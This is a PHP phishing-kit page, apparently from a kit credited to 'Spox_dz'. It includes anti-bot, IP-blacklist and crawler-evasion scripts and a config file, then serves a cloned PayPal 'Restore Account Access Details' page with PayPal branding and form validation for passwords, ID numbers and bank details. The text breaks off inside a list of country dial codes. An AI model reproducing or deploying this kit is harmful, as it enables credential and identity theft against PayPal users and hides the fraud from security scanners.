<?php
session_start();
error_reporting(0);

/**
 * DO NOT SELL THIS SCRIPT ! 
 * DO NOT CHANGE COPYRIGHT !
 * Chase -
 * version 3.0
 * icq & telegram = @spoxcoder
 
###############################################
#$            C0d3d by Spox_dz               $#
#$   Recording doesn't  make you a Coder     $#
#$          Copyright 2020 Chase             $#
###############################################

**/
include'antiobot.php';  
include'Spox/Anti/IP-BlackList.php';  
include'Spox/Anti/Bot-Crawler.php';
include'Spox/Anti/Bot-Spox.php';
include'Spox/Anti/blacklist.php';
include'Spox/Anti/new.php';
include'Spox/Functions/Fuck-you.php'; 
include'Spox/Anti/Dila_DZ.php';
include'admin/YOUR-CONFIG.php';
***************************************************************************************************************************************************************************************************************************************************

<!DOCTYPE html>
<html lang="en"
      class="fresh-html"
      data-controller="store_logins"
      data-action="new">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel='preconnect' href='https://v.shopify.com'>
<link rel='preconnect' href='https://monorail-edge.shopifysvc.com' crossorigin>
<link rel='preconnect' href='https://cdn.shopify.com'>
<link rel='preconnect' href='https://www.gstatic.com' crossorigin>
<link rel='preconnect' href='https://www.google.com' crossorigin>
<link rel='preconnect' href='https://fonts.gstatic.com' crossorigin>
<link rel='preconnect' href='https://www.recaptcha.net' crossorigin>
  <link rel='preconnect' href='https://shopify-assets.shopifycdn.com' crossorigin><title>Restore Account Access Details - PayPal</title><meta http-equiv="content-type" content="text/html; charset=UTF-8" /><meta name="application-name" content="PayPal" /><meta name="msapplication-task" content="name=My Account;action-uri=https://www.paypal.com/us/cgi-bin/webscr?cmd=_account;icon-uri=http://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico" /><meta name="msapplication-task" content="name=Send Money;action-uri=https://www.paypal.com/us/cgi-bin/webscr?cmd=_send-money-transfer&amp;send_method=domestic;icon-uri=http://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico" /><meta name="msapplication-task" content="name=Request Money;action-uri=https://personal.paypal.com/cgi-bin/?cmd=_render-content&amp;content_ID=marketing_us/request_money;icon-uri=http://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico" /><meta name="keywords" content="transfer money, email money transfer, international money transfer " /><meta name="description" content="Transfer money online in seconds with PayPal money transfer. All you need is an email address." /><link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico" /><link rel="apple-touch-icon" href="https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=yes" /><!--Script info: script: node, template:  , date: , country: , language: web version: content version: hostname : rZJvnqaaQhLn/nmWT8cSUjOx898qoYZ0tfQd2knzcSxqGqKBzjKFHWIUW7NeUneK0ppYSStnTR8rlogid : --><!--Script info: script: node, template:  , date: Apr 14, 2018 21:00:56 -07:00, country: SG, language: en web version:  content version:  hostname : rZJvnqaaQhLn/nmWT8cSUjOx898qoYZ0tfQd2knzcSxqGqKBzjKFHWIUW7NeUneK0ppYSStnTR8 rlogid : B8H7E9MJNGS9Vw5apXyGpUbVPkWlbpbN%2FUUHq1B23yoryFkc%2F9d4h2eX4C1puRYE%2Bd9rQLCjUXgGegH%2BqQEjz%2FOAvyPPimddlG5fbDA7V3o_162c776871b --><link rel="stylesheet" href="https://www.paypalobjects.com/web/res/29d/502715a85a845592b91fc190325a5/css/app-ROW.css" /><!--[if IE]><link href="https://www.paypalobjects.com/web/res/29d/502715a85a845592b91fc190325a5/css/ie.css" rel="stylesheet" type="text/css" /><![endif]--><!--[if IE 8]><link href="https://www.paypalobjects.com/web/res/29d/502715a85a845592b91fc190325a5/css/ie8.css" rel="stylesheet" type="text/css" /><![endif]--><!--[if IE 7]><link href="https://www.paypalobjects.com/web/res/29d/502715a85a845592b91fc190325a5/css/ie7.css" rel="stylesheet" type="text/css" /><![endif]--><script nonce="" src="https://www.paypalobjects.com/web/res/29d/502715a85a845592b91fc190325a5/js/lib/modernizr-2.6.1.js"></script><style id="antiClickjack">body {display: none !important;}</style><script nonce="">if (self === top) {var antiClickjack = document.getElementById("antiClickjack");antiClickjack.parentNode.removeChild(antiClickjack);} else {top.location = self.location;}window.TIMEOUT_MSG = "Are you still there? You’ll be logged out in [COUNT] second(s). Click anywhere to stay logged in.";</script><script nonce="">window.PAYPAL = window.PAYPAL || {};window.PAYPAL.merchantboarding = PAYPAL.merchantboarding || {};window.PAYPAL.merchantboarding.validationContent = {"genericError": "We're sorry, but something seems to have gone wrong. Please try again.","invalidCityStateZip": "Check your city/country and postal code and try again.","minChars8": "Use at least 8 characters.","numberSymbol":"Use at least 1 number or symbol (!@#$%^).","upperCaseLetter": "Please enter at least 1 uppercase letter.","lowerCaseLetter": "Please enter at least 1 lowercase letter.","noEmail": "Please don't use your email address.","noSpaces": "Please don't use spaces.","noRepeats": "Please don't use 4 repeated characters (1111, aaaa).","noSequence": "Please don't use 4 sequential characters (1234, qwer).","matchPasswords": "The passwords don't match.","passwordRequired": "The password must be at least 8 characters. Use upper and lower case, symbols and numbers.","required": "This info is required.","emailRequired": "This info is required. It's what you will use to log in.","captchaRequired": "This into is required.","bizPhoneRequired": "This info is required.","dobRequired": "This info is required.","invalidEmail": "Your email address isn't formatted correctly.","enterAddress": "Enter the street and house number for your business.","enterZip": "Please check your postal code.","invalidZipCode": "Check your postal code.","zipOutsideUS": "We can't accept a U.S. territory address.","noPoBox": "We can't accept PO boxes.","noPoBoxResAddress": "☃noPoBoxResAddress☃","ownerFirstName": "Please enter your first or given name according to your NRIC/FIN or passport.","ownerLastName": "Please enter your surname or last name according to your NRIC/FIN or passport.","businessName": "The business name you enter should match the one on your bank account to ensure that you can withdraw money received on your PayPal account later.","businessPhone": "☃businessPhone☃","invalidDate": "Please enter a valid date of birth.","over18": "You must be at least 18 years of age to sign up.","under100": "You must be under 100 years old to sign up.","processing": "Processing...","invalidSocial": "Check and try again.","invalidEntry": "Check and try again.","requiredOccupationBO": "☃requiredOccupationBO☃","requiredTaxIDBO": "☃requiredTaxIDBO☃","invalidPhoneDigitsCheck": "The phone number should contain only digits. Please check and try again.","invalidPhoneNumCheck": "The phone number should start with '0'. Please check and try again.","zipCode": "Please enter a valid  postal code for the business address.","emailAddress": "This info is required. It's what you will use to log in.","businessPhone": "☃businessPhone☃","businessTradingName": "☃businessTradingName☃","invalidBusinessUrl": "Not a valid url format. Should be of format http://www.yourdomain.com or https://www.yourdomain.com","businessEstablished": "Please enter valid month and year.","businessEstablished3PL": "Please enter valid registration date.","ccStatementName": "☃ccStatementName☃","bankAccountNameRequired": "☃bankAccountNameRequired☃","bankCodeRequired": "☃bankCodeRequired☃","branchCodeRequired": "☃branchCodeRequired☃","bankAccountNumberRequired": "☃bankAccountNumberRequired☃","matchAccountNumber": "☃matchAccountNumber☃","businessUrlRequired": "☃businessUrlRequired☃","invalidDateOfIncorp": "☃invalidDateOfIncorp☃","invalidDDDFormat": "☃invalidDDDFormat☃","invalidPhoneFormat": "☃invalidPhoneFormat☃","lastNameHint":"☃lastNameHint☃","weakPassword":"☃weakPassword☃","invalidSelfCertFirstName":"The first name entered here must match the name entered when the account was created.","invalidSelfCertLastName":"The last name entered here must match the name entered when the account was created.","lengthUEN": "This doesn’t look right. Your UEN/Acra number should be 9 or 10 characters.","validNRIC": "Your first and last characters should be letters, please check and try again.","nationalIDLength":"Let’s try this again, your NRIC or FIN should be 9 characters long.","zeroPhoneNumCheck":"The phone number you entered should not start with '0'. Please check and try again.","noResultsMatchedInDropDown":"No results matched","noIdentityDocument":"Please provide a number for your identity document.","placeholderPassport":"Passport number","placeholderDriverLicense":"Driver's license number","placeholderNationalID":"National ID number","invalidPercentage": "☃invalidPercentage☃","invalidMaxPercentage":"☃invalidMaxPercentage☃","radioRequired": "Please make a selection."};</script></head><body data-is-mobile="" data-content="" data-data="{&quot;flowIdentifier&quot;:{&quot;signupType&quot;:&quot;CREATE_NEW_ACCOUNT&quot;,&quot;country&quot;:&quot;SG&quot;,&quot;language&quot;:&quot;en&quot;,&quot;productIntent&quot;:&quot;no_intent&quot;},&quot;analytics&quot;:{&quot;customQualifier&quot;:&quot;&quot;},&quot;ubComponents&quot;:{&quot;actionButton&quot;:{&quot;isMini&quot;:false,&quot;primary&quot;:true,&quot;isFormnovalidate&quot;:false,&quot;isDisabled&quot;:false,&quot;name&quot;:&quot;_eventId_continue&quot;,&quot;value&quot;:&quot;Agree and Continue&quot;,&quot;class&quot;:&quot;com.paypal.unifiedboarding.framework.model.ActionButtonField$ActionButtonFieldProperties&quot;,&quot;isAutoFocus&quot;:false},&quot;emailAddress&quot;:{&quot;name&quot;:&quot;email&quot;,&quot;isDisabled&quot;:false,&quot;isToolTipEnabled&quot;:false,&quot;isOptional&quot;:false,&quot;class&quot;:&quot;com.paypal.unifiedboarding.framework.model.InputFieldComponentInfo$InputFieldProperties&quot;,&quot;isChecked&quot;:false},&quot;captcha&quot;:{&quot;captchaImgUrl&quot;:&quot;&quot;,&quot;captchaAudioUrl&quot;:&quot;&quot;}},&quot;flowExecutionKey&quot;:&quot;&quot;,&quot;flowExecutionUrl&quot;:&quot;create&quot;,&quot;signupType&quot;:&quot;newsignup&quot;,&quot;inputModel&quot;:{&quot;riskCorrelationId&quot;:&quot;sZ4O1ecr4EfXJ9XvPEQpL2Y6ScFo8XrA&quot;,&quot;isMobile&quot;:false,&quot;country_code&quot;:&quot;SG&quot;,&quot;currencyList&quot;:[{&quot;currency&quot;:&quot;AUD&quot;,&quot;currencyName&quot;:&quot;Australian Dollar&quot;},{&quot;currency&quot;:&quot;GBP&quot;,&quot;currencyName&quot;:&quot;British Pound&quot;},{&quot;currency&quot;:&quot;CAD&quot;,&quot;currencyName&quot;:&quot;Canadian Dollar&quot;},{&quot;currency&quot;:&quot;CZK&quot;,&quot;currencyName&quot;:&quot;Czech Republic Koruna&quot;},{&quot;currency&quot;:&quot;DKK&quot;,&quot;currencyName&quot;:&quot;Danish Krone&quot;},{&quot;currency&quot;:&quot;EUR&quot;,&quot;currencyName&quot;:&quot;Euro&quot;},{&quot;currency&quot;:&quot;HKD&quot;,&quot;currencyName&quot;:&quot;Hong Kong Dollar&quot;},{&quot;currency&quot;:&quot;HUF&quot;,&quot;currencyName&quot;:&quot;Hungarian Forint&quot;},{&quot;currency&quot;:&quot;ILS&quot;,&quot;currencyName&quot;:&quot;Israeli New Shekel&quot;},{&quot;currency&quot;:&quot;JPY&quot;,&quot;currencyName&quot;:&quot;Japanese Yen&quot;},{&quot;currency&quot;:&quot;MXN&quot;,&quot;currencyName&quot;:&quot;Mexican Peso&quot;},{&quot;currency&quot;:&quot;TWD&quot;,&quot;currencyName&quot;:&quot;New Taiwan Dollar&quot;},{&quot;currency&quot;:&quot;NZD&quot;,&quot;currencyName&quot;:&quot;New Zealand Dollar&quot;},{&quot;currency&quot;:&quot;NOK&quot;,&quot;currencyName&quot;:&quot;Norwegian Krone&quot;},{&quot;currency&quot;:&quot;PHP&quot;,&quot;currencyName&quot;:&quot;Philippine Peso&quot;},{&quot;currency&quot;:&quot;PLN&quot;,&quot;currencyName&quot;:&quot;Polish Zloty&quot;},{&quot;currency&quot;:&quot;RUB&quot;,&quot;currencyName&quot;:&quot;Russian Rouble&quot;},{&quot;currency&quot;:&quot;SGD&quot;,&quot;currencyName&quot;:&quot;Singapore Dollar&quot;},{&quot;currency&quot;:&quot;SEK&quot;,&quot;currencyName&quot;:&quot;Swedish Krona&quot;},{&quot;currency&quot;:&quot;CHF&quot;,&quot;currencyName&quot;:&quot;Swiss Franc&quot;},{&quot;currency&quot;:&quot;THB&quot;,&quot;currencyName&quot;:&quot;Thai Baht&quot;},{&quot;currency&quot;:&quot;USD&quot;,&quot;currencyName&quot;:&quot;US Dollar&quot;}],&quot;phoneCountryCodesList&quot;:[{&quot;$id&quot;:&quot;AF&quot;,&quot;$dialCode&quot;:&quot;93&quot;,&quot;$name&quot;:&quot;Afghanistan&quot;,&quot;$elt&quot;:&quot;Afghanistan (+93)&quot;},{&quot;$id&quot;:&quot;AX&quot;,&quot;$dialCode&quot;:&quot;358&quot;,&quot;$name&quot;:&quot;Åland Islands&quot;,&quot;$elt&quot;:&quot;Åland Islands (+358)&quot;},{&quot;$id&quot;:&quot;AL&quot;,&quot;$dialCode&quot;:&quot;355&quot;,&quot;$name&quot;:&quot;Albania&quot;,&quot;$elt&quot;:&quot;Albania (+355)&quot;},{&quot;$id&quot;:&quot;DZ&quot;,&quot;$dialCode&quot;:&quot;213&quot;,&quot;$name&quot;:&quot;Algeria&quot;,&quot;$elt&quot;:&quot;Algeria (+213)&quot;},{&quot;$id&quot;:&quot;AS&quot;,&quot;$dialCode&quot;:&quot;1&quot;,&quot;$name&quot;:&quot;American Samoa&quot;,&quot;$elt&quot;:&quot;American Samoa (+1684)&quot;},{&quot;$id&quot;:&quot;AD&quot;,&quot;$dialCode&quot;:&quot;376&quot;,&quot;$name&quot;:&quot;Andorra&quot;,&quot;$elt&quot;:&quot;Andorra (+376)&quot;},{&quot;$id&quot;:&quot;AO&quot;,&quot;$dialCode&quot;:&quot;244&quot;,&quot;$name&quot;:&quot;Angola&quot;,&quot;$elt&quot;:&quot;Angola (+244)&quot;},{&quot;$id&quot;:&quot;AI&quot;,&quot;$dialCode&quot;:&quot;1&quot;,&quot;$name&quot;:&quot;Anguilla&quot;,&quot;$elt&quot;:&quot;Anguilla (+1264)&quot;},{&quot;$id&quot;:&quot;AG&quot;,&quot;$dialCode&quot;:&quot;1&quot;,&quot;$name&quot;:&quot;Antigua &amp; Barbuda&quot;,&quot;$elt&quot;:&quot;Antigua &amp; Barbuda (+1268)&quot;},{&quot;$id&quot;:&quot;AR&quot;,&quot;$dialCode&quot;:&quot;54&quot;,&quot;$name&quot;:&quot;Argentina&quot;,&quot;$elt&quot;:&quot;Argentina (+54)&quot;},{&quot;$id&quot;:&quot;AM&quot;,&quot;$dialCode&quot;:&quot;374&quot;,&quot;$name&quot;:&quot;Armenia&quot;,&quot;$elt&quot;:&quot;Armenia (+374)&quot;},{&quot;$id&quot;:&quot;AW&quot;,&quot;$dialCode&quot;:&quot;297&quot;,&quot;$name&quot;:&quot;Aruba&quot;,&quot;$elt&quot;:&quot;Aruba (+297)&quot;},{&quot;$id&quot;:&quot;AU&quot;,&quot;$dialCode&quot;:&quot;61&quot;,&quot;$name&quot;:&quot;Australia&quot;,&quot;$elt&quot;:&quot;Australia (+61)&quot;},{&quot;$id&quot;:&quot;AT&quot;,&quot;$dialCode&quot;:&quot;43&quot;,&quot;$name&quot;:&quot;Austria&quot;,&quot;$elt&quot;:&quot;Austria (+43)&quot;},{&quot;$id&quot;:&quot;AZ&quot;,&quot;$dialCode&quot;:&quot;994&quot;,&quot;$name&quot;:&quot;Azerbaijan&quot;,&quot;$elt&quot;:&quot;Azerbaijan (+994)&quot;},{&quot;$id&quot;:&quot;BS&quot;,&quot;$dialCode&quot;:&quot;1&quot;,&quot;$name&quot;:&quot;Bahamas&quot;,&quot;$elt&quot;:&quot;Bahamas (+1242)&quot;},{&quot;$id&quot;:&quot;BH&quot;,&quot;$dialCode&quot;:&quot;973&quot;,&quot;$name&quot;:&quot;Bahrain&quot;,&quot;$elt&quot;:&quot;Bahrain (+973)&quot;},{&quot;$id&quot;:&quot;BD&quot;,&quot;$dialCode&quot;:&quot;880&quot;,&quot;$name&quot;:&quot;Bangladesh&quot;,&quot;$elt&quot;:&quot;Bangladesh (+880)&quot;},{&quot;$id&quot;:&quot;BB&quot;,&quot;$dialCode&quot;:&quot;1&quot;,&quot;$name&quot;:&quot;Barbados&quot;,&quot;$elt&quot;:&quot;Barbados (+1246)&quot;},{&quot;$id&quot;:&quot;BY&quot;,&quot;$dialCode&quot;:&quot;375&quot;,&quot;$name&quot;:&quot;Belarus&quot;,&quot;$elt&quot;:&quot;Belarus (+375)&quot;},{&quot;$id&quot;:&quot;BE&quot;,&quot;$dialCode&quot;:&quot;32&quot;,&quot;$name&quot;:&quot;Belgium&quot;,&quot;$elt&quot;:&quot;Belgium (+32)&quot;},{&quot;$id&quot;:&quot;BZ&quot;,&quot;$dialCode&quot;:&quot;501&quot;,&quot;$name&quot;:&quot;Belize&quot;,&quot;$elt&quot;:&quot;Belize (+501)&quot;},{&quot;$id&quot;:&quot;BJ&quot;,&quot;$dialCode&quot;:&quot;229&quot;,&quot;$name&quot;:&quot;Benin&quot;,&quot;$elt&quot;:&quot;Benin (+229)&quot;},{&quot;$id&quot;:&quot;BM&quot;,&quot;$dialCode&quot;:&quot;1&quot;,&quot;$name&quot;:&quot;Bermuda&quot;,&quot;$elt&quot;:&quot;Bermuda (+1441)&quot;},{&quot;$id&quot;:&quot;BT&quot;,&quot;$dialCode&quot;:&quot;975&quot;,&quot;$name&quot;:&quot;Bhutan&quot;,&quot;$elt&quot;:&quot;Bhutan (+975)&quot;},{&quot;$id&quot;:&quot;BO&quot;,&quot;$dialCode&quot;:&quot;591&quot;,&quot;$name&quot;:&quot;Bolivia&quot;,&quot;$elt&quot;:&quot;Bolivia (+591)&quot;},{&quot;$id&quot;:&quot;BA&quot;,&quot;$dialCode&quot;:&quot;387&quot;,&quot;$name&quot;:&quot;Bosnia &amp; Herzegovina&quot;,&quot;$elt&quot;:&quot;Bosnia &amp; Herzegovina (+387)&quot;},{&quot;$id&quot;:&quot;BW&quot;,&quot;$dialCode&quot;:&quot;267&quot;,&quot;$name&quot;:&quot;Botswana&quot;,&quot;$elt&quot;:&quot;Botswana (+267)&quot;},{&quot;$id&quot;:&quot;BR&quot;,&quot;$dialCode&quot;:&quot;55&quot;,&quot;$name&quot;:&quot;Brazil&quot;,&quot;$elt&quot;:&quot;Brazil (+55)&quot;},{&quot;$id&quot;:&quot;VG&quot;,&quot;$dialCode&quot;:&quot;1&quot;,&quot;$name&quot;:&quot;British Virgin Islands&quot;,&quot;$elt&quot;:&quot;British Virgin Islands (+1284)&quot;},{&quot;$id&quot;:&quot;BN&quot;,&quot;$dialCode&quot;:&quot;673&quot;,&quot;$name&quot;:&quot;Brunei&quot;,&quot;$elt&quot;:&quot;Brunei (+673)&quot;},{&quot;$id&quot;:&quot;BG&quot;,&quot;$dialCode&quot;:&quot;359&quot;,&quot;$name&quot;:&quot;Bulgaria&quot;,&quot;$elt&quot;:&quot;Bulgaria (+359)&quot;},{&quot;$id&quot;:&quot;BF&quot;,&quot;$dialCode&quot;:&quot;226&quot;,&quot;$name&quot;:&quot;Burkina Faso&quot;,&quot;$elt&quot;:&quot;Burkina Faso (+226)&quot;},{&quot;$id&quot;:&quot;BI&quot;,&quot;$dialCode&quot;:&quot;257&quot;,&quot;$name&quot;:&quot;Burundi&quot;,&quot;$elt&quot;:&quot;Burundi (+257)&quot;},{&quot;$id&quot;:&quot;KH&quot;,&quot;$dialCode&quot;:&quot;855&quot;,&quot;$name&quot;:&quot;Cambodia&quot;,&quot;$elt&quot;:&quot;Cambodia (+855)&quot;},{&quot;$id&quot;:&quot;CM&quot;,&quot;$dialCode&quot;:&quot;237&quot;,&quot;$name&quot;:&quot;Cameroon&quot;,&quot;$elt&quot;:&quot;Cameroon (+237)&quot;},{&quot;$id&quot;:&quot;CA&quot;,&quot;$dialCode&quot;:&quot;1&quot;,&quot;$name&quot;:&quot;Canada&quot;,&quot;$elt&quot;:&quot;Canada (+1)&quot;},{&quot;$id&quot;:&quot;CV&quot;,&quot;$dialCode&quot;:&quot;238&quot;,&quot;$name&quot;:&quot;Cape Verde&quot;,&quot;$elt&quot;:&quot;Cape Verde (+238)&quot;},{&quot;$id&quot;:&quot;BQ&quot;,&quot;$dialCode&quot;:&quot;599&quot;,&quot;$name&quot;:&quot;Caribbean Netherlands&quot;,&quot;$elt&quot;:&quot;Caribbean Netherlands (+599)&quot;},{&quot;$id&quot;:&quot;KY&quot;,&quot;$dialCode&quot;:&quot;1&quot;,&quot;$name&quot;:&quot;Cayman Islands&quot;,&quot;$elt&quot;:&quot;Cayman Islands (+1345)&quot;},{&quot;$id&quot;:&quot;CF&quot;,&quot;$dialCode&quot;:&quot;236&quot;,&quot;$name&quot;:&quot;Central African Republic&quot;,&quot;$elt&quot;:&quot;Central African Republic (+236)&quot;},{&quot;$id&quot;:&quot;TD&quot;,&quot;$dialCode&quot;:&quot;235&quot;,&quot;$name&quot;:&quot;Chad&quot;,&quot;$elt&quot;:&quot;Chad (+235)&quot;},{&quot;$id&quot;:&quot;CL&quot;,&quot;$dialCode&quot;:&quot;56&quot;,&quot;$name&quot;:&quot;Chile&quot;,&quot;$elt&quot;:&quot;Chile (+56)&quot;},{&quot;$id&quot;:&quot;C2&quot;,&quot;$dialCode&quot;:&quot;86&quot;,&quot;$name&quot;:&quot;China&quot;,&quot;$elt&quot;:&quot;China (+86)&quot;},{&quot;$id&quot;:&quot;CC&quot;,&quot;$dialCode&quot;:&quot;61&quot;,&quot;$name&quot;:&quot;Cocos (Keeling) Islands&quot;,&quot;$elt&quot;:&quot;Cocos (Keeling) Islands (+61)&quot;},{&quot;$id&quot;:&quot;CO&quot;,&quot;$dialCode&quot;:&quot;57&quot;,&quot;$name&quot;:&quot;Colombia&quot;,&quot;$elt&quot;:&quot;Colombia (+57)&quot;},{&quot;$id&quot;:&quot;KM&quot;,&quot;$dialCode&quot;:&quot;269&quot;,&quot;$name&quot;:&quot;Comoros&quot;,&quot;$elt&quot;:&quot;Comoros (+269)&quot;},{&quot;$id&quot;:&quot;CG&quot;,&quot;$dialCode&quot;:&quot;242&quot;,&quot;$name&quot;:&quot;Congo - Brazzaville&quot;,&quot;$elt&quot;:&quot;Congo - Brazzaville (+242)&quot;},{&quot;$id&quot;:&quot;CD&quot;,&quot;$dialCode&quot;:&quot;243&quot;,&quot;$name&quot;:&quot;Congo - Kinshasa&quot;,&quot;$elt&quot;:&quot;Congo - Kinshasa (+243)&quot;},{&quot;$id&quot;:&quot;CK&quot;,&quot;$dialCode&quot;:&quot;682&quot;,&quot;$name&quot;:&quot;Cook Islands&quot;,&quot;$elt&quot;:&quot;Cook Islands (+682)&quot;},{&quot;$id&quot;:&quot;CR&quot;,&quot;$dialCode&quot;:&quot;506&quot;,&quot;$name&quot;:&quot;Costa Rica&quot;,&quot;$elt&quot;:&quot;Costa Rica (+506)&quot;},{&quot;$id&quot;:&quot;CI&quot;,&quot;$dialCode&quot;:&quot;225&quot;,&quot;$name&quot;:&quot;Côte d’Ivoire&quot;,&quot;$elt&quot;:&quot;Côte d’Ivoire (+225)&quot;},{&quot;$id&quot;:&quot;HR&quot;,&quot;$dialCode&quot;:&quot;385&quot;,&quot;$name&quot;:&quot;Croatia&quot;,&quot;$elt&quot;:&quot;Croatia (+385)&quot;},{&quot;$id&quot;:&quot;CU&quot;,&quot;$dialCode&quot;:&quot;53&quot;,&quot;$name&quot;:&quot;Cuba&quot;,&quot;$elt&quot;:&quot;Cuba (+53)&quot;},{&quot;$id&quot;:&quot;CW&quot;,&quot;$dialCode&quot;:&quot;599&quot;,&quot;$name&quot;:&quot;Curaçao&quot;,&quot;$elt&quot;:&quot;Curaçao (+599)&quot;},{&quot;$id&quot;:&quot;CY&quot;,&quot;$dialCode&quot;:&quot;357&quot;,&quot;$name&quot;:&quot;Cyprus&quot;,&quot;$elt&quot;:&quot;Cyprus (+357)&quot;},{&quot;$id&quot;:&quot;CZ&quot;,&quot;$dialCode&quot;:&quot;420&quot;,&quot;$name&quot;:&quot;Czech Republic&quot;,&quot;$elt&quot;:&quot;Czech Republic (+420)&quot;},{&quot;$id&quot;:&quot;DK&quot;,&quot;$dialCode&quot;:&quot;45&quot;,&quot;$name&quot;:&quot;Denmark&quot;,&quot;$elt&quot;:&quot;Denmark (+45)&quot;},{&quot;$id&quot;:&quot;DJ&quot;,&quot;$dialCode&quot;:&quot;253&quot;,&quot;$name&quot;:&quot;Djibouti&quot;,&quot;$elt&quot;:&quot;Djibouti (+253)&quot;},{&quot;$id&quot;:&quot;DM&quot;,&quot;$dialCode&quot;:&quot;1&quot;,&quot;$name&quot;:&quot;Dominica&quot;,&quot;$elt&quot;:&quot;Dominica (+1767)&quot;},{&quot;$id&quot;:&quot;DO&quot;,&quot;$dialCode&quot;:&quot;1&quot;,&quot;$name&quot;:&quot;Dominican Republic&quot;,&quot;$elt&quot;:&quot;Dominican Republic (+1809)&quot;},{&quot;$id&quot;:&quot;EC&quot;,&quot;$dialCode&quot;:&quot;593&quot;,&quot;$name&quot;:&quot;Ecuador&quot;,&quot;$elt&quot;:&quot;Ecuador (+593)&quot;},{&quot;$id&quot;:&quot;EG&quot;,&quot;$dialCode&quot;:&quot;20&quot;,&quot;$name&quot;:&quot;Egypt&quot;,&quot;$elt&quot;:&quot;Egypt (+20)&quot;},{&quot;$id&quot;:&quot;SV&quot;,&quot;$dialCode&quot;:&quot;503&quot;,&quot;$name&quot;:&quot;El Salvador&quot;,&quot;$elt&quot;:&quot;El Salvador (+503)&quot;},{&quot;$id&quot;:&quot;GQ&quot;,&quot;$dialCode&quot;:&quot;240&quot;,&quot;$name&quot;:&quot;Equatorial Guinea&quot;,&quot;$elt&quot;:&quot;Equatorial Guinea (+240)&quot;},{&quot;$id&quot;:&quot;ER&quot;,&quot;$dialCode&quot;:&quot;291&quot;,&quot;$name&quot;:&quot;Eritrea&quot;,&quot;$elt&quot;:&quot;Eritrea (+291)&quot;},{&quot;$id&quot;:&quot;EE&quot;,&quot;$dialCode&quot;:&quot;372&quot;,&quot;$name&quot;:&quot;Estonia&quot;,&quot;$elt&quot;:&quot;Estonia (+372)&quot;},{&quot;$id&quot;:&quot;ET&quot;,&quot;$dialCode&quot;:&quot;251&quot;,&quot;$name&quot;:&quot;Ethiopia&quot;,&quot;$elt&quot;:&quot;Ethiopia (+251)&quot;},{&quot;$id&quot;:&quot;FK&quot;,&quot;$dialCode&quot;:&quot;500&quot;,&quot;$name&quot;:&quot;Falkland Islands&quot;,&quot;$elt&quot;:&quot;Falkland Islands (+500)&quot;},{&quot;$id&quot;:&quot;FO&quot;,&quot;$dialCode&quot;:&quot;298&quot;,&quot;$name&quot;:&quot;Faroe Islands&quot;,&quot;$elt&quot;:&quot;Faroe Islands (+298)&quot;},{&quot;$id&quot;:&quot;FJ&quot;,&quot;$dialCode&quot;:&quot;679&quot;,&quot;$name&quot;:&quot;Fiji&quot;,&quot;$elt&quot;:&quot;Fiji (+679)&quot;},{&quot;$id&quot;:&quot;FI&quot;,&quot;$dialCode&quot;:&quot;358&quot;,&quot;$name&quot;:&quot;Finland&quot;,&quot;$elt&quot;:&quot;Finland (+358)&quot;},{&quot;$id&quot;:&quot;FR&quot;,&quot;$dialCode&quot;:&quot;33&quot;,&quot;$name&quot;:&quot;France&quot;,&quot;$elt&quot;:&quot;France (+33)&quot;},{&quot;$id&quot;:&quot;GF&quot;,&quot;$dialCode&quot;:&quot;594&quot;,&quot;$name&quot;:&quot;French Guiana&quot;,&quot;$elt&quot;:&quot;French Guiana (+594)&quot;},{&quot;$id&quot;:&quot;PF&quot;,&quot;$dialCode&quot;:&quot;689&quot;,&quot;$name&quot;:&quot;French Polynesia&quot;,&quot;$elt&quot;:&quot;French Polynesia (+689)&quot;},{&quot;$id&quot;:&quot;GA&quot;,&quot;$dialCode&quot;:&quot;241&quot;,&quot;$name&quot;:&quot;Gabon&quot;,&quot;$elt&quot;:&quot;Gabon (+241)&quot;},{&quot;$id&quot;:&quot;GM&quot;,&quot;$dialCode&quot;:&quot;220&quot;,&quot;$name&quot;:&quot;Gambia&quot;,&quot;$elt&quot;:&quot;Gambia (+220)&quot;},{&quot;$id&quot;:&quot;GE&quot;,&quot;$dialCode&quot;:&quot;995&quot;,&quot;$name&quot;:&quot;Georgia&quot;,&quot;$elt&quot;:&quot;Georgia (+995)&quot;},{&quot;$id&quot;:&quot;DE&quot;,&quot;$dialCode&quot;:&quot;49&quot;,&quot;$name&quot;:&quot;Germany&quot;,&quot;$elt&quot;:&quot;Germany (+49)&quot;},{&quot;$id&quot;:&quot;GH&quot;,&quot;$dialCode&quot;:&quot;233&quot;,&quot;$name&quot;:&quot;Ghana&quot;,&quot;$elt&quot;:&quot;Ghana (+233)&quot;},{&quot;$id&quot;:&quot;GI&quot;,&quot;$dialCode&quot;:&quot;350&quot;,&quot;$name&quot;:&quot;Gibraltar&quot;,&quot;$elt&quot;:&quot;Gibraltar (+350)&quot;},{&quot;$id&quot;:&quot;GR&quot;,&quot;$dialCode&quot;:&quot;30&quot;,&quot;$name&quot;:&quot;Greece&quot;,&quot;$elt&quot;:&quot;Greece (+30)&quot;},{&quot;$id&quot;:&quot;GL&quot;,&quot;$dialCode&quot;:&quot;299&quot;,&quot;$name&quot;:&quot;Greenland&quot;,&quot;$elt&quot;:&quot;Greenland (+299)&quot;},{&quot;$id&quot;:&quot;GD&quot;,&quot;$dialCode&quot;:&quot;1&quot;,&quot;$name&quot;:&quot;Grenada&quot;,&quot;$elt&quot;:&quot;Grenada (+1473)&quot;},{&quot;$id&quot;:&quot;GP&quot;,&quot;$dialCode&quot;:&quot;590&quot;,&quot;$name&quot;:&quot;Guadeloupe&quot;,&quot;$elt&quot;:&quot;Guadeloupe (+590)&quot;},{&quot;$id&quot;:&quot;GU&quot;,&quot;$dialCode&quot;:&quot;1&quot;,&quot;$name&quot;:&quot;Guam&quot;,&quot;$elt&quot;:&quot;Guam (+1671)&quot;},{&quot;$id&quot;:&quot;GT&quot;,&quot;$dialCode&quot;:&quot;502&quot;,&quot;$name&quot;:&quot;Guatemala&quot;,&quot;$elt&quot;:&quot;Guatemala 